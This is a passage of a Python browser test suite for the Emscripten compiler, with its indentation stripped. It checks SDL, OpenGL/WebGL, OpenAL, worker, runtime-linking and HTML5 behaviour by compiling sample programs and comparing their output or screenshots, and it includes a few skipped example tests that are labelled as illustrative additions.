self.btest('cubegeom_pre2_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_pre2_vao2(self):
self.btest('cubegeom_pre2_vao2.c', reference='cubegeom_pre2_vao2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_es(self):
self.btest('cubegeom_pre_vao_es.c', reference='cubegeom_pre_vao.png', args=['-s', 'FULL_ES2=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_u4fv_2(self):
self.btest('cubegeom_u4fv_2.c', reference='cubegeom_u4fv_2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cube_explosion(self):
self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_glgettexenv(self):
self.btest('glgettexenv.c', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], expected=['1'])
def test_sdl_canvas_blank(self):
self.btest('sdl_canvas_blank.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_blank.png')
def test_sdl_canvas_palette(self):
self.btest('sdl_canvas_palette.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_palette.png')
def test_sdl_canvas_twice(self):
self.btest('sdl_canvas_twice.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_twice.png')
def test_sdl_set_clip_rect(self):
self.btest('sdl_set_clip_rect.c', args=['-lSDL', '-lGL'], reference='sdl_set_clip_rect.png')
def test_sdl_maprgba(self):
self.btest('sdl_maprgba.c', args=['-lSDL', '-lGL'], reference='sdl_maprgba.png', reference_slack=3)
def test_sdl_create_rgb_surface_from(self):
self.btest('sdl_create_rgb_surface_from.c', args=['-lSDL', '-lGL'], reference='sdl_create_rgb_surface_from.png')
def test_sdl_rotozoom(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png', '--use-preload-plugins', '-lSDL', '-lGL'], reference_slack=3)
def test_sdl_gfx_primitives(self):
self.btest('sdl_gfx_primitives.c', args=['-lSDL', '-lGL'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
create_test_file('pre.js', '''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
create_test_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_test_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_test_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js', '-lSDL', '-lGL'])
def test_sdl_ttf_render_text_solid(self):
self.btest('sdl_ttf_render_text_solid.c', reference='sdl_ttf_render_text_solid.png', args=['-O2', '-s', 'INITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_alloctext(self):
self.btest('sdl_alloctext.c', expected='1', args=['-O2', '-s', 'INITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_surface_refcount(self):
self.btest('sdl_surface_refcount.c', args=['-lSDL'], expected='1')
def test_sdl_free_screen(self):
self.btest('sdl_free_screen.cpp', args=['-lSDL', '-lGL'], reference='htmltest.png')
@requires_graphics_hardware
def test_glbegin_points(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_s3tc(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_s3tc_ffp_only(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1', '-s', 'GL_FFP_ONLY=1', '-lGL', '-lSDL'])
@no_chrome('see #7117')
@requires_graphics_hardware
def test_aniso(self):
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
@requires_graphics_hardware
def test_tex_nonbyte(self):
self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_float_tex(self):
self.btest('float_tex.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_subdata(self):
self.btest('gl_subdata.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_perspective(self):
self.btest('perspective.c', reference='perspective.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_glerror(self):
self.btest('gl_error.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL'])
def test_openal_error(self):
for args in [
[],
['-lopenal', '-s', 'STRICT'],
['--closure', '1']
]:
print(args)
self.btest('openal_error.c', expected='1', args=args)
def test_openal_capture_sanity(self):
self.btest('openal_capture_sanity.c', expected='0')
def test_runtimelink(self):
main, supp = self.setup_runtimelink_test()
create_test_file('supp.cpp', supp)
self.compile_btest(['supp.cpp', '-o', 'supp.wasm', '-s', 'SIDE_MODULE=1', '-O2', '-s', 'EXPORT_ALL=1'])
self.btest(main, args=['-DBROWSER=1', '-s', 'MAIN_MODULE=1', '-O2', '-s', 'RUNTIME_LINKED_LIBS=["supp.wasm"]', '-s', 'EXPORT_ALL=1'], expected='76')
def test_pre_run_deps(self):
# Adding a dependency in preRun will delay run
create_test_file('pre.js', '''
Module.preRun = function() {
addRunDependency();
out('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
for mem in [0, 1]:
self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])
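  # Hedged sketch, not part of the original suite: the same run-dependency
  # mechanism as test_pre_run_deps above, but using a *named* dependency id,
  # which is how application code usually calls addRunDependency(). It assumes
  # pre_run_deps.cpp behaves identically with a named dependency; kept skipped
  # since it is illustrative only.
  @unittest.skip('illustrative sketch only, not part of the original suite')
  def test_pre_run_deps_named_sketch(self):
    create_test_file('pre.js', '''
      Module.preRun = function() {
        addRunDependency('my-async-setup'); // run() is delayed until this id is removed
        out('preRun called, added a named dependency...');
        setTimeout(function() {
          Module.okk = 10;
          removeRunDependency('my-async-setup');
        }, 2000);
      };
    ''')
    self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js'])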
@no_wasm_backend('mem init file')
def test_mem_init(self):
create_test_file('pre.js', '''
function myJSCallback() { // called from main()
Module._note(1);
}
Module.preRun = function() {
addOnPreMain(function() {
Module._note(2);
});
};
''')
create_test_file('post.js', '''
var assert = function(check, text) {
if (!check) {
console.log('assert failed: ' + text);
maybeReportResultToServer(9);
}
}
Module._note(4); // this happens too early! and is overwritten when the mem init arrives
''')
# with assertions, we notice when memory was written to too early
self.btest('mem_init.cpp', expected='9', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1'])
# otherwise, we just overwrite
self.btest('mem_init.cpp', expected='3', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1', '-s', 'ASSERTIONS=0'])
@no_wasm_backend('mem init file')
def test_mem_init_request(self):
def test(what, status):
print(what, status)
create_test_file('pre.js', '''
var xhr = Module.memoryInitializerRequest = new XMLHttpRequest();
xhr.open('GET', "''' + what + '''", true);
xhr.responseType = 'arraybuffer';
xhr.send(null);
console.warn = function(x) {
if (x.indexOf('a problem seems to have happened with Module.memoryInitializerRequest') >= 0) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?0');
setTimeout(xhr.onload = function() {
console.log('close!');
window.close();
}, 1000);
xhr.send();
throw 'halt';
}
console.log('WARNING: ' + x);
};
''' % self.port)
self.btest('mem_init_request.cpp', expected=status, args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--memory-init-file', '1'])
test('test.html.mem', '1')
test('nothing.nowhere', '0')
def test_runtime_misuse(self):
post_prep = '''
var expected_ok = false;
function doCcall(n) {
ccall('note', 'string', ['number'], [n]);
}
var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization
function doCwrapCall(n) {
var str = wrapped(n);
out('got ' + str);
assert(str === 'silly-string');
}
function doDirectCall(n) {
Module['_note'](n);
}
'''
post_test = '''
var ok = false;
try {
doCcall(1);
ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort
} catch(e) {
out('expected fail 1');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doCwrapCall(2);
ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call will abort
} catch(e) {
out('expected fail 2');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doDirectCall(3);
        ok = true; // should fail and not reach here, runtime is not ready yet so any code execution will abort
} catch(e) {
out('expected fail 3');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
'''
post_hook = r'''
function myJSCallback() {
// Run on the next event loop, as code may run in a postRun right after main().
setTimeout(function() {
var xhr = new XMLHttpRequest();
assert(Module.noted);
xhr.open('GET', 'http://localhost:%s/report_result?' + HEAP32[Module.noted>>2]);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}, 0);
// called from main, this is an ok time
doCcall(100);
doCwrapCall(200);
doDirectCall(300);
}
''' % self.port
create_test_file('pre_runtime.js', r'''
Module.onRuntimeInitialized = function(){
myJSCallback();
};
''')
for filename, extra_args, second_code in [
('runtime_misuse.cpp', [], 600),
('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601) # 601, because no main means we *do* run another call after exit()
]:
for mode in [[], ['-s', 'WASM=0']]:
print('\n', filename, extra_args, mode)
print('mem init, so async, call too early')
create_test_file('post.js', post_prep + post_test + post_hook)
self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1', '-s', 'EXIT_RUNTIME=1'] + extra_args + mode)
print('sync startup, call too late')
create_test_file('post.js', post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '-s', 'EXIT_RUNTIME=1'] + extra_args + mode)
print('sync, runtime still alive, so all good')
create_test_file('post.js', post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected='606', args=['--post-js', 'post.js'] + extra_args + mode)
def test_cwrap_early(self):
self.btest(os.path.join('browser', 'cwrap_early.cpp'), args=['-O2', '-s', 'ASSERTIONS=1', '--pre-js', path_from_root('tests', 'browser', 'cwrap_early.js'), '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["cwrap"]'], expected='0')
def test_worker_api(self):
self.compile_btest([path_from_root('tests', 'worker_api_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]'])
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_2(self):
self.compile_btest([path_from_root('tests', 'worker_api_2_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-O2', '--minify', '0', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two", "_three", "_four"]', '--closure', '1'])
self.btest('worker_api_2_main.cpp', args=['-O2', '--minify', '0'], expected='11')
def test_worker_api_3(self):
self.compile_btest([path_from_root('tests', 'worker_api_3_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]'])
self.btest('worker_api_3_main.cpp', expected='5')
def test_worker_api_sleep(self):
self.compile_btest([path_from_root('tests', 'worker_api_worker_sleep.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]'] + self.get_async_args())
self.btest('worker_api_main.cpp', expected='566')
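  # Hedged sketch, not part of the original suite: a minimal end-to-end example
  # of the worker API the tests above build on (BUILD_AS_WORKER=1 plus
  # emscripten_create_worker/emscripten_call_worker/emscripten_worker_respond).
  # The sources and the expected value here are hypothetical; kept skipped since
  # it is illustrative only.
  @unittest.skip('illustrative sketch only, not part of the original suite')
  def test_worker_api_sketch(self):
    create_test_file('sketch_worker.c', r'''
      #include <emscripten.h>
      void one(char *data, int size) {
        // echo the payload back to the caller, incremented by one
        data[0] = data[0] + 1;
        emscripten_worker_respond(data, size);
      }
    ''')
    main_src = r'''
      #include <emscripten.h>
      void callback(char *data, int size, void *arg) {
        REPORT_RESULT(data[0]);
      }
      int main() {
        worker_handle worker = emscripten_create_worker("worker.js");
        char payload[1] = { 41 };
        emscripten_call_worker(worker, "one", payload, sizeof(payload), callback, 0);
        return 0;
      }
    '''
    self.compile_btest(['sketch_worker.c', '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]'])
    self.btest(main_src, expected='42')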
def test_emscripten_async_wget2(self):
self.btest('http.cpp', expected='0', args=['-I' + path_from_root('tests')])
# TODO: test only worked in non-fastcomp
@unittest.skip('non-fastcomp is deprecated and fails in 3.5')
def test_module(self):
self.compile_btest([path_from_root('tests', 'browser_module.cpp'), '-o', 'module.js', '-O2', '-s', 'SIDE_MODULE=1', '-s', 'DLOPEN_SUPPORT=1', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two"]'])
self.btest('browser_main.cpp', args=['-O2', '-s', 'MAIN_MODULE=1', '-s', 'DLOPEN_SUPPORT=1', '-s', 'EXPORT_ALL=1'], expected='8')
def test_preload_module(self):
create_test_file('library.c', r'''
#include <stdio.h>
int library_func() {
return 42;
}
''')
self.compile_btest(['library.c', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'library.wasm', '-s', 'EXPORT_ALL=1'])
os.rename('library.wasm', 'library.so')
main = r'''
#include <dlfcn.h>
#include <stdio.h>
#include <emscripten.h>
int main() {
int found = EM_ASM_INT(
return Module['preloadedWasm']['/library.so'] !== undefined;
);
if (!found) {
REPORT_RESULT(1);
return 1;
}
void *lib_handle = dlopen("/library.so", 0);
if (!lib_handle) {
REPORT_RESULT(2);
return 2;
}
typedef int (*voidfunc)();
voidfunc x = (voidfunc)dlsym(lib_handle, "library_func");
if (!x || x() != 42) {
REPORT_RESULT(3);
return 3;
}
REPORT_RESULT(0);
return 0;
}
'''
self.btest(
main,
args=['-s', 'MAIN_MODULE=1', '--preload-file', '.@/', '-O2', '--use-preload-plugins', '-s', 'EXPORT_ALL=1'],
expected='0')
def test_mmap_file(self):
create_test_file('data.dat', 'data from the file ' + ('.' * 9000))
self.btest(path_from_root('tests', 'mmap_file.c'), expected='1', args=['--preload-file', 'data.dat'])
def test_emrun_info(self):
if not has_browser():
self.skipTest('need a browser')
result = self.run_process([path_from_root('emrun'), '--system_info', '--browser_info'], stdout=PIPE).stdout
assert 'CPU' in result
assert 'Browser' in result
assert 'Traceback' not in result
result = self.run_process([path_from_root('emrun'), '--list_browsers'], stdout=PIPE).stdout
assert 'Traceback' not in result
  # Deliberately named test_zzz_emrun so that it runs last, since it may take
  # the focus away from the main test window by opening a new window and
  # possibly not closing it.
def test_zzz_emrun(self):
self.compile_btest([path_from_root('tests', 'test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
if not has_browser():
self.skipTest('need a browser')
    # We cannot run emrun from the temp directory that the suite will clean up afterwards: the
    # launched browser uses that directory as its startup directory and does not close as part of
    # the test, which pins down the cwd on Windows and makes it impossible to delete. Therefore
    # switch away from that directory before launching.
os.chdir(path_from_root())
args_base = [path_from_root('emrun'), '--timeout', '30', '--safe_firefox_profile',
'--kill_exit', '--port', '6939', '--verbose',
'--log_stdout', self.in_dir('stdout.txt'),
'--log_stderr', self.in_dir('stderr.txt')]
if EMTEST_BROWSER is not None:
      # If EMTEST_BROWSER carried command line arguments to pass to the browser
      # (e.g. "firefox -profile /path/to/foo"), those can't be passed via emrun,
# so strip them out.
browser_cmd = shlex.split(EMTEST_BROWSER)
browser_path = browser_cmd[0]
args_base += ['--browser', browser_path]
if len(browser_cmd) > 1:
browser_args = browser_cmd[1:]
if 'firefox' in browser_path and ('-profile' in browser_args or '--profile' in browser_args):
# emrun uses its own -profile, strip it out
parser = argparse.ArgumentParser(add_help=False) # otherwise it throws with -headless
parser.add_argument('-profile')
parser.add_argument('--profile')
browser_args = parser.parse_known_args(browser_args)[1]
if browser_args:
args_base += ['--browser_args', ' ' + ' '.join(browser_args)]
for args in [
args_base,
args_base + ['--private_browsing', '--port', '6941']
]:
args += [self.in_dir('hello_world.html'), '1', '2', '--3']
print(shared.shlex_join(args))
proc = self.run_process(args, check=False)
self.assertEqual(proc.returncode, 100)
stdout = open(self.in_dir('stdout.txt'), 'r').read()
stderr = open(self.in_dir('stderr.txt'), 'r').read()
self.assertContained('argc: 4', stdout)
self.assertContained('argv[3]: --3', stdout)
self.assertContained('hello, world!', stdout)
self.assertContained('Testing ASCII characters: !"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~', stdout)
self.assertContained('Testing char sequences: %20%21 ä', stdout)
self.assertContained('hello, error stream!', stderr)
# This does not actually verify anything except that --cpuprofiler and --memoryprofiler compiles.
# Run interactive.test_cpuprofiler_memoryprofiler for interactive testing.
@requires_graphics_hardware
def test_cpuprofiler_memoryprofiler(self):
self.btest('hello_world_gles.c', expected='0', args=['-DLONGTEST=1', '-DTEST_MEMORYPROFILER_ALLOCATIONS_MAP=1', '-O2', '--cpuprofiler', '--memoryprofiler', '-lGL', '-lglut', '-DANIMATE'])
def test_uuid(self):
# Run with ./runner.py browser.test_uuid
# We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of
# high quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available).
# First run tests in Node and/or SPIDERMONKEY using self.run_js. Use closure compiler so we can check that
    # require('crypto').randomBytes and window.crypto.getRandomValues don't get minified out.
self.compile_btest(['-O2', '--closure', '1', path_from_root('tests', 'uuid', 'test.c'), '-o', 'test.js', '-luuid'])
test_js_closure = open('test.js').read()
# Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues"
assert ").randomBytes" in test_js_closure
assert "window.crypto.getRandomValues" in test_js_closure
out = self.run_js('test.js')
print(out)
# Tidy up files that might have been created by this test.
try_delete(path_from_root('tests', 'uuid', 'test.js'))
try_delete(path_from_root('tests', 'uuid', 'test.js.map'))
# Now run test in browser
self.btest(path_from_root('tests', 'uuid', 'test.c'), '1', args=['-luuid'])
@requires_graphics_hardware
def test_glew(self):
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION=1'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-DGLEW_MX'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION=1', '-DGLEW_MX'], expected='1')
def test_doublestart_bug(self):
create_test_file('pre.js', r'''
if (!Module['preRun']) Module['preRun'] = [];
Module["preRun"].push(function () {
addRunDependency('test_run_dependency');
removeRunDependency('test_run_dependency');
});
''')
self.btest('doublestart.c', args=['--pre-js', 'pre.js', '-o', 'test.html'], expected='1')
@requires_threads
def test_html5(self):
for opts in [[], ['-O2', '-g1', '--closure', '1', '-s', 'HTML5_SUPPORT_DEFERRING_USER_SENSITIVE_REQUESTS=0'], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'], ['-s', 'MIN_FIREFOX_VERSION=0', '-s', 'MIN_SAFARI_VERSION=0', '-s', 'MIN_IE_VERSION=0', '-s', 'MIN_EDGE_VERSION=0', '-s', 'MIN_CHROME_VERSION=0']]:
print(opts)
self.btest(path_from_root('tests', 'test_html5.c'), args=[] + opts, expected='0')
@requires_threads
def test_html5_gamepad(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
print(opts)
self.btest(path_from_root('tests', 'test_gamepad.c'), args=[] + opts, expected='0')
@requires_graphics_hardware
def test_html5_webgl_create_context_no_antialias(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts + ['-DNO_ANTIALIAS', '-lGL'], expected='0')
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_threads
@requires_graphics_hardware
def test_html5_webgl_create_context(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1'], ['-s', 'USE_PTHREADS=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts + ['-lGL'], expected='0')
@requires_graphics_hardware
  # Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context on Module.canvas without an ID explicitly assigned to it.
def test_html5_webgl_create_context2(self):
self.btest(path_from_root('tests', 'webgl_create_context2.cpp'), expected='0')
@requires_graphics_hardware
  # Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context on Module.canvas without an ID explicitly assigned to it.
# (this only makes sense in the old deprecated -s DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=0 mode)
def test_html5_special_event_targets(self):
self.btest(path_from_root('tests', 'browser', 'html5_special_event_targets.cpp'), args=['-lGL'], expected='0')
@requires_graphics_hardware
def test_html5_webgl_destroy_context(self):
for opts in [[], ['-O2', '-g1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_destroy_context.cpp'), args=opts + ['--shell-file', path_from_root('tests/webgl_destroy_context_shell.html'), '-lGL'], expected='0')
@no_chrome('see #7373')
@requires_graphics_hardware
def test_webgl_context_params(self):
if WINDOWS:
self.skipTest('SKIPPED due to bug https://bugzilla.mozilla.org/show_bug.cgi?id=1310005 - WebGL implementation advertises implementation defined GL_IMPLEMENTATION_COLOR_READ_TYPE/FORMAT pair that it cannot read with')
self.btest(path_from_root('tests', 'webgl_color_buffer_readpixels.cpp'), args=['-lGL'], expected='0')
# Test for PR#5373 (https://github.com/emscripten-core/emscripten/pull/5373)
def test_webgl_shader_source_length(self):
for opts in [[], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_shader_source_length.cpp'), args=opts + ['-lGL'], expected='0')
def test_webgl2(self):
for opts in [
['-s', 'MIN_CHROME_VERSION=0'],
['-O2', '-g1', '--closure', '1', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1'],
['-s', 'FULL_ES2=1'],
]:
print(opts)
self.btest(path_from_root('tests', 'webgl2.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'] + opts, expected='0')
@requires_graphics_hardware
@requires_threads
def test_webgl2_pthreads(self):
# test that a program can be compiled with pthreads and render WebGL2 properly on the main thread
# (the testcase doesn't even use threads, but is compiled with thread support).
self.btest(path_from_root('tests', 'webgl2.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL', '-s', 'USE_PTHREADS=1'], expected='0')
def test_webgl2_objects(self):
self.btest(path_from_root('tests', 'webgl2_objects.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
def test_html5_webgl_api(self):
for mode in [['-s', 'OFFSCREENCANVAS_SUPPORT=1', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'],
['-s', 'OFFSCREEN_FRAMEBUFFER=1', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'],
[]]:
self.btest(path_from_root('tests', 'html5_webgl.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'] + mode, expected='0')
def test_webgl2_ubos(self):
self.btest(path_from_root('tests', 'webgl2_ubos.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
@requires_graphics_hardware
def test_webgl2_garbage_free_entrypoints(self):
self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1'], expected='1')
self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), expected='1')
@requires_graphics_hardware
def test_webgl2_backwards_compatibility_emulation(self):
self.btest(path_from_root('tests', 'webgl2_backwards_compatibility_emulation.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-s', 'WEBGL2_BACKWARDS_COMPATIBILITY_EMULATION=1'], expected='0')
@requires_graphics_hardware
def test_webgl2_runtime_no_context(self):
    # Tests that if we support WebGL 1 and 2, and WebGL2RenderingContext exists
    # but context creation fails, we can then manually try to create a WebGL1
    # context and succeed.
self.btest(path_from_root('tests', 'test_webgl2_runtime_no_context.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2'], expected='1')
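  # Hedged sketch, not part of the original suite: roughly the WebGL2->WebGL1
  # fallback pattern that the test above exercises (the real
  # test_webgl2_runtime_no_context.cpp is not shown here, so this is an
  # approximation based on the html5.h context API). Kept skipped since it is
  # illustrative only.
  @unittest.skip('illustrative sketch only, not part of the original suite')
  def test_webgl2_runtime_no_context_sketch(self):
    src = r'''
      #include <emscripten/html5.h>
      int main() {
        EmscriptenWebGLContextAttributes attrs;
        emscripten_webgl_init_context_attributes(&attrs);
        attrs.majorVersion = 2; // ask for a WebGL2 context first
        EMSCRIPTEN_WEBGL_CONTEXT_HANDLE ctx = emscripten_webgl_create_context("#canvas", &attrs);
        if (ctx <= 0) {
          attrs.majorVersion = 1; // context creation failed, fall back to WebGL1 manually
          ctx = emscripten_webgl_create_context("#canvas", &attrs);
        }
        REPORT_RESULT(ctx > 0 ? 1 : 0);
        return 0;
      }
    '''
    self.btest(src, args=['-s', 'MAX_WEBGL_VERSION=2'], expected='1')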
@requires_graphics_hardware
def test_webgl2_invalid_teximage2d_type(self):
self.btest(path_from_root('tests', 'webgl2_invalid_teximage2d_type.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2'], expected='0')
@requires_graphics_hardware
def test_webgl_with_closure(self):
self.btest(path_from_root('tests', 'webgl_with_closure.cpp'), args=['-O2', '-s', 'MAX_WEBGL_VERSION=2', '--closure', '1', '-lGL'], expected='0')
# Tests that -s GL_ASSERTIONS=1 and glVertexAttribPointer with packed types works
@requires_graphics_hardware
def test_webgl2_packed_types(self):
self.btest(path_from_root('tests', 'webgl2_draw_packed_triangle.c'), args=['-lGL', '-s', 'MAX_WEBGL_VERSION=2', '-s', 'GL_ASSERTIONS=1'], expected='0')
@requires_graphics_hardware
def test_webgl2_pbo(self):
self.btest(path_from_root('tests', 'webgl2_pbo.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mipmap(self):
self.btest(path_from_root('tests', 'third_party', 'sokol', 'mipmap-emsc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL', '-O1'],
reference=os.path.join('third_party', 'sokol', 'mipmap-emsc.png'), reference_slack=2)
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mrt(self):
self.btest(path_from_root('tests', 'third_party', 'sokol', 'mrt-emcc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'],
reference=os.path.join('third_party', 'sokol', 'mrt-emcc.png'))
@requires_graphics_hardware
def test_webgl2_sokol_arraytex(self):
self.btest(path_from_root('tests', 'third_party', 'sokol', 'arraytex-emsc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'],
reference=os.path.join('third_party', 'sokol', 'arraytex-emsc.png'))
def test_sdl_touch(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'sdl_touch.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_html5_mouse(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_html5_mouse.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0')
def test_sdl_mousewheel(self):
